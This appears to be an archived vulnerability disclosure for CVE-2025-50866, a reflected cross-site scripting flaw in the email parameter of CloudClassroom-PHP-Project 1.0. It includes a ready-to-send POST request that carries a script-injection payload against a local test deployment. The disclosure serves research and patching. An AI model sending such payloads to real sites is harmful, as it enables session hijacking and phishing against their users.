CVE-2025-50866 PoC — CloudClassroom-PHP-Project 安全漏洞

Source

https://github.com/SacX-7/CVE-2025-50866

Associated Vulnerability

Title:CloudClassroom-PHP-Project 安全漏洞 (CVE-2025-50866)
Description:CloudClassroom-PHP-Project是Vishal Mathur个人开发者的一个云课堂网站。 CloudClassroom-PHP-Project 1.0版本存在安全漏洞，该漏洞源于反射型跨站脚本漏洞，可能导致会话劫持或钓鱼攻击。

Description

Cross Site Scripting (XSS)

Readme

CloudClassroom-PHP-Project 1.0 contains a reflected Cross-site
Scripting (XSS) vulnerability in the email parameter of the
postquerypublic endpoint. Improper sanitization allows an attacker to
inject arbitrary JavaScript code that executes in the context of the
user s browser, potentially leading to session hijacking or phishing
attacks.

------------------------------------------

Vulnerability Type : 

Cross Site Scripting (XSS)

------------------------------------------

Vendor of Product : 

https://github.com/mathurvishal/CloudClassroom-PHP-Project

------------------------------------------

Affected Product Code Base : 

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0

------------------------------------------

Affected Component : 
postquerypublic.php, email parameter in POST request

------------------------------------------

Attack Type : 
Remote

------------------------------------------

Attack Vectors
------------------------------------------

An attacker can exploit this vulnerability by sending a crafted POST request to the vulnerable endpoint /CloudClassroom-PHP-Project-master/postquerypublic, injecting malicious JavaScript via the email parameter. The application reflects this input without sanitization, leading to reflected XSS.

------------------------------------------
Reproduction Steps:
------------------------------------------

Deploy the vulnerable PHP app locally (e.g., http://localhost/CloudClassroom-PHP-Project-master/).

Send the following POST request:

POST /CloudClassroom-PHP-Project-master/postquerypublic HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

email=testing@example.com'"()&%<zzz><ScRiPt >alert(9001)</ScRiPt>&gnamex=abc&squeryx=123&update=Post%20Query!

------------------------------------------

Reference
https://owasp.org/www-community/attacks/xss/

------------------------------------------

Discoverer : saurabh

Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/

File Snapshot


 [4.0K]  /data/pocs/c1ae0961fd75d2b2155e44161f915507a7242455
├── [1.9K]  Cross Site Scripting (XSS)
└── [2.0K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!